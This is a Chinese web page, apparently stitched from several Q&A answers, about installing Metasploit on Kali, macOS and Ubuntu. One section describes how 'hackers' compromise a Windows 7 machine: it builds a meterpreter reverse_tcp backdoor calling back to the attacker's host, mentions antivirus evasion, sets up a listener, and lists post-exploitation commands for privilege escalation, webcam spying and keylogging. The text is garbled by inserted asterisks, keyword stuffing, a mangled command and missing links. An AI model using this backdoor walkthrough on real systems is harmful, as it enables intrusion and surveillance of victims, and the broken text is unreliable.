目录：

• 1、kali linux下怎么装Metasploit
• 2、看黑客怎么使用Metasploit进行渗透windows7的
• 3、metasploit在mac上怎么用
• 4、如何正确的使用Ubuntu以及安装常用的渗透工具集
• 5、如何安装metasploit
• 6、如何在ubuntu中安装metasploit环境

kali linux下怎么装Metasploit

Kali Linux系统是一个渗透测试平台，所以许多渗透测试工具都被集成在了里面，而且Kali使用了Debian系统的软件包管理方式，也就是说Kali可以用apt-get命令安装软件，Metasploit这个软件当然也可以用软件源方式来安装，所以在Kali上安装Metasploit的命令是这样的：

apt-get install metasploit

看黑客怎么使用Metasploit进行渗透windows7的

很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣msf渗透工具怎么安装，针对这些以下业内相关专家就给大家介绍下，当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为：cn_win7_x86_7601虚拟机，地址为：192.168.0.116；而本地主机就为：192.168.0.149。 *** 步骤一：黑客用Msfpayload直接生成相关的后门程序，如下图。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149xsteup.exe *** 步骤二：黑客直接就能进入所在的目录并将属性进行修改，换为允许以程序执行文件，详细如下图。进入所在目录，修改属性：选择“允许以程序执行文件”,这时候也可以做一些免杀 *** 步骤三：接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机，最后就能开始进行监听msf渗透工具怎么安装了，详细情况如下图。打开msfconsole，加载exploit/multi/handler模块，设置本地主机；然后开始监听：exploit-z-j： *** 步骤四：黑客需要能将程序直接拷贝都目标主机中并进行执行。 *** 步骤五：以上步骤全部完成后黑客就能通过后门程序反向连接到msf，用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf，详细的如下图。Meterpreter就是metasploit框架中的一个扩展模块，因此的话溢出成功后黑客就能攻击载荷进行使用，一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道，这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。另外，附meterpreter常用命令：getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景，需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/www#在/var/www目录监控目标主机的摄像头keylog_recorder#使用migrate将会话迁移至explorer.exe的进程空间后记录键盘

metasploit在mac上怎么用

安装的几个步骤：

1.从github上克隆Metasploit项目到本地；

2.安装postgresql并进行配置；

3.安装特定版本的ruby，并解决依赖；

1.从GITHUB上克隆METASPLOIT项目到本地

git clone /usr/local/share/metasploit-framework

克隆到本地后，将metasploit-framework/config/目录下的配置文件：database.yml 添加到环境变量中（database.yml 也许不存在，直接复制database.yml.example）

在$HOME/.bash_profile或者其他配置文件中添加下面这条配置

export MSF_DATABASE_CONFIG=/usr/local/share/metasploit-framework/config/database.yml

2.安装POSTGRESQL并进行配置

metasploit下载完后，不急着去配置，因为metasploit的默认数据库postgresql还没有装上

你可以直接使用brew来下载并自动安装postgresql，可以运行如下命令

brew install postgresql --without-ossp-build

等待自动安装完毕，完成后，初始化postgresql（若出现错误删掉/usr/local/var/postgres，并重试）

initdb /usr/local/var/postgres

初始化完毕后，为metasploit添加数据库用户和创建相应DB

createuser msf -P -h localhost createdb -O msf msf -h localhost

（上面参数不懂了，大家可以百度一下，这里就不做过多解释了）

上面的步骤完成后，需更改metasploit的数据库连接配置，也就是之一步中的database.yml文件

在database.yml中，将信息修改如下

production: adapter: postgresql database: msf username: msf password: yourpassword host: 127.0.0.1 port: 5432 pool: 75 timeout: 5

完成后，进入第三步！

（可自行添加alisa来简便每一次postgresql的启动）

alias pg_start='pg_ctl -D /usr/local/var/postgres -l /usr/local/var/postgres/server.log start' alias pg_stop='pg_ctl -D /usr/local/var/postgres stop'

3.安装特定版本的RUBY，并解决依赖

说到ruby的多版本管理，这里就要用最给力的工具了rbenv（可以在github上找到，也可以使用brew直接安装）brew install rbenv ruby-build

rbenv安装完成后，在$HOST/.bash_profile或其他配置文件中添加如下设置eval "$(rbenv init -)"

下面就可以通过rbenv来安装特定版本的ruby了，首先列出当前可用的ruby版本rbenv install --list

可以看到几乎所有的ruby版本都有，这里我们选择安装ruby-1.9.3-p547（因为OS X 10.9.3 自带的ruby为2.0.0版本，在某些地方会产生问题）rbenv install 1.9.3-p547

这里可能会等一会儿，rbenv会将各个版本的ruby安装在$HOST/.rbenv/versions/下，完成后，将下载的版本设置为系统默认rbenv rehash rbenv global 1.9.3-p547

完成后，重新打开终端，输入ruby –version就可以看到当前默认的ruby版本已经设置成为1.9.3-p547

下面安 *** undle来解决依赖问题gem install bundle

安装的时候，可能会出连接问题，多试几次即可

bundle安装完毕后，再次进入metasploit的主目录解决模块包的依赖cd /usr/local/share/metasploit-framework rbenv rehash bundle install

（在bundle install的过程中，可能会出现某一个特定版本的模块安装失败的问题，解决 *** ：根据GemFiles里的版本限制，自行使用gem安装替代版本，完成后，删掉GemFiles.lock，重新运行bundle install）

依赖解决后，即可运行目录下的msfconsole启动metasploit终端控制器（已启动postgresql，不然会连不上数据库）

可以将msf命令批量ln到bin下for MSF in $(ls msf*); do ln -s /usr/local/share/metasploit-framework/$MSF /usr/local/bin/$MSF;done

如何正确的使用Ubuntu以及安装常用的渗透工具集

AMDCPU使用文本方式安装版本 Ubuntu源非常丰富,必像Windows样四处搜寻;Ubuntu上安装工具众多,使用也简单.Ubuntu系统提供命令行安装工具有apt-get、dpkg等,图形化安装工具有更新管理器、添加删除程序

如何安装metasploit

Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。

首先在Metesploit官网下载最新的安装包。下载地址：

下载之后记得比对校检码，如果校检码不符合，说明安装包在下载过程中损坏，需要重新下载。损坏的安装包在安装的时候会出现has no VFS data的错误。笔者就因为没有比对校检码，导致一直出错。校检码比对 *** ：打开终端，切换到下载目录，输入命令：sha1sum 安装包 结果类似于

47a56013000dded69956da0a827c910a9ced48c7 metasploit-latest-linux-installer.run

将前面的这串字符串与metasploit官方给出的SHA值比较，如果吻合，说明安装包是完整的。SHA值地址：verify-download/

然后开始在Ubuntu下安装。

先安装ruby。命令：sudo apt-get install ruby

给予安装包执行（x）权限。sudo chmod u+x 安装包

运行安装包。sudo ./安装包

这时候就会出现安装界面，一直下一步就好了。

在这里向大家推荐一本关于Metasploit的书：Metasploit:The Penetration Tester's Guide.中文名译为Metasploit渗透测试指南。笔者有英文版的PDF。

Metasploit渗透测试指南英文原版下载

下载地址在

用户名与密码都是

具体下载目录在 /2012年资料/10月/5日/Ubuntu下安装Metasploit/Metasploit渗透测试指南英文原版

如何在ubuntu中安装metasploit环境

安装metasploit

1、curl msfinstall

2、chmod 755 msfinstall

3、./msfinstall

依次执行上面的三条命令即可安装成功

2

安装postgresql数据库

安装数据库的时候会自动创建系统用户postgres,数据库用户postgres,数据库postgres

1、apt-get install postgresql //安装postgresql数据库

2、su - postgres //切换到postgres用户

3、psql //登陆postgresql数据库，首次登陆没有密码

4、\password postgres //修改数据库用户postgres的密码

3

msf使用数据库

1、msfconsole //启动msf

2、db_connect postgres:hehehe@127.0.0.1/test //用户名，密码，地址，自己随意编造的名字。

3、db_status //查看数据库连接状态

4

安装完成，可以开始你的metasploit渗透之路了！！！

5

参考：如果希望添加新的用户

建立一个普通用户

useradd -m feng //feng是我的用户名，你可以改成任意用户名。

passwd feng //设置一下新建的用户名的密码。

usermod -a -G sudo feng //修改用户的附加组为超级管理组。

chsh -s /bin/bash feng //设置用户使用的命令控制台。

6

sure : if you want to download it from "http" with thunder and so on , please open

then move to the bottom , get it !!